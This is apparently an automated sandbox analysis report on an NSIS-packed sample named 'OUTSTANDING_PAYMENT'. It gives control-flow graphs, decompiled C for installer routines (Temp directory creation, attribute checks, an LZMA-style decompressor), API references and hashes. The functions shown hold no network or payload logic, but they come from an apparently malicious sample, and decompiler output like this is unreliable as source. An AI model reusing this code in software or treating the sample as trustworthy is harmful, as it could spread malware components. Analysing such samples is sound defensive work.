                                                                                                                        control_flow_graph 672 4015c1-4015d5 call 402da6 call 405fe2 677 401631-401634 672->677 678 4015d7-4015ea call 405f64 672->678 679 401663-4022f6 call 401423 677->679 680 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 677->680 685 401604-401607 call 405c16 678->685 686 4015ec-4015ef 678->686 696 402c2a-402c39 679->696 697 40292e-402935 679->697 680->696 699 40165b-40165e 680->699 695 40160c-40160e 685->695 686->685 689 4015f1-4015f8 call 405c33 686->689 689->685 703 4015fa-4015fd call 405b99 689->703 701 401610-401615 695->701 702 401627-40162f 695->702 697->696 699->696 705 401624 701->705 706 401617-401622 GetFileAttributesW 701->706 702->677 702->678 708 401602 703->708 705->702 706->702 706->705 708->695
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                                                        0x004015c1
                                                                                                                        0x004015c9
                                                                                                                        0x004015cc
                                                                                                                        0x004015d1
                                                                                                                        0x004015d5
                                                                                                                        0x004015d7
                                                                                                                        0x004015df
                                                                                                                        0x004015e1
                                                                                                                        0x004015e4
                                                                                                                        0x004015ea
                                                                                                                        0x00401604
                                                                                                                        0x00401607
                                                                                                                        0x004015ec
                                                                                                                        0x004015ec
                                                                                                                        0x004015ef
                                                                                                                        0x00000000
                                                                                                                        0x004015fa
                                                                                                                        0x004015fd
                                                                                                                        0x004015fd
                                                                                                                        0x004015ef
                                                                                                                        0x0040160e
                                                                                                                        0x00401615
                                                                                                                        0x00401624
                                                                                                                        0x00401624
                                                                                                                        0x00401617
                                                                                                                        0x0040161a
                                                                                                                        0x00401622
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401622
                                                                                                                        0x00401615
                                                                                                                        0x00401627
                                                                                                                        0x0040162b
                                                                                                                        0x0040162c
                                                                                                                        0x004015d7
                                                                                                                        0x00401634
                                                                                                                        0x00401663
                                                                                                                        0x004022f1
                                                                                                                        0x00401636
                                                                                                                        0x00401638
                                                                                                                        0x00401645
                                                                                                                        0x0040164d
                                                                                                                        0x00401655
                                                                                                                        0x0040165b
                                                                                                                        0x0040165b
                                                                                                                        0x00401655
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                          • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1892508949-501415292
                                                                                                                        • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                                                        • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                                                        • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                                                        • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 709 40603f-40605a call 406668 call 405fe2 714 406060-40606d call 4068ef 709->714 715 40605c-40605e 709->715 719 40607d-406081 714->719 720 40606f-406075 714->720 716 4060b8-4060ba 715->716 722 406097-4060a0 lstrlenW 719->722 720->715 721 406077-40607b 720->721 721->715 721->719 723 4060a2-4060b6 call 405f37 GetFileAttributesW 722->723 724 406083-40608a call 40699e 722->724 723->716 729 406091-406092 call 405f83 724->729 730 40608c-40608f 724->730 729->722 730->715 730->729
                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                                                        0x0040604b
                                                                                                                        0x00406056
                                                                                                                        0x0040605a
                                                                                                                        0x00406061
                                                                                                                        0x0040606d
                                                                                                                        0x0040607d
                                                                                                                        0x0040607f
                                                                                                                        0x00406097
                                                                                                                        0x00406098
                                                                                                                        0x0040609f
                                                                                                                        0x004060a0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406083
                                                                                                                        0x0040608a
                                                                                                                        0x00406092
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040608a
                                                                                                                        0x004060a2
                                                                                                                        0x004060a8
                                                                                                                        0x00000000
                                                                                                                        0x004060b6
                                                                                                                        0x0040606f
                                                                                                                        0x00406075
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406075
                                                                                                                        0x0040605c
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00405FF0
                                                                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                          • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                        • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560,00000000), ref: 00406098
                                                                                                                        • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004060A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: P_B
                                                                                                                        • API String ID: 3248276644-906794629
                                                                                                                        • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                        • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                                                        • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                        • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 732 407194-40719a 733 40719c-40719e 732->733 734 40719f-4071bd 732->734 733->734 735 407490-40749d 734->735 736 4073cb-4073e0 734->736 739 4074c7-4074cb 735->739 737 4073e2-4073f8 736->737 738 4073fa-407410 736->738 740 407413-40741a 737->740 738->740 741 40752b-40753e 739->741 742 4074cd-4074ee 739->742 743 407441 740->743 744 40741c-407420 740->744 747 407447-40744d 741->747 745 4074f0-407505 742->745 746 407507-40751a 742->746 743->747 748 407426-40743e 744->748 749 4075cf-4075d9 744->749 750 40751d-407524 745->750 746->750 752 406bf2 747->752 753 4075fa 747->753 748->743 754 4075e5-4075f8 749->754 755 4074c4 750->755 756 407526 750->756 757 406bf9-406bfd 752->757 758 406d39-406d5a 752->758 759 406c9e-406ca2 752->759 760 406d0e-406d12 752->760 762 4075fd-407601 753->762 754->762 755->739 763 4074a9-4074c1 756->763 764 4075db 756->764 757->754 765 406c03-406c10 757->765 758->736 768 406ca8-406cc1 759->768 769 40754e-407558 759->769 766 406d18-406d2c 760->766 767 40755d-407567 760->767 763->755 764->754 765->753 770 406c16-406c5c 765->770 771 406d2f-406d37 766->771 767->754 772 406cc4-406cc8 768->772 769->754 773 406c84-406c86 770->773 774 406c5e-406c62 770->774 771->758 771->760 772->759 775 406cca-406cd0 772->775 780 406c94-406c9c 773->780 781 406c88-406c92 773->781 778 406c64-406c67 GlobalFree 774->778 779 406c6d-406c7b GlobalAlloc 774->779 776 406cd2-406cd9 775->776 777 406cfa-406d0c 775->777 782 406ce4-406cf4 GlobalAlloc 776->782 783 406cdb-406cde GlobalFree 776->783 777->771 778->779 779->753 784 406c81 779->784 780->772 781->780 781->781 782->753 782->777 783->782 784->773
                                                                                                                        C-Code - Quality: 99%
                                                                                                                        			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
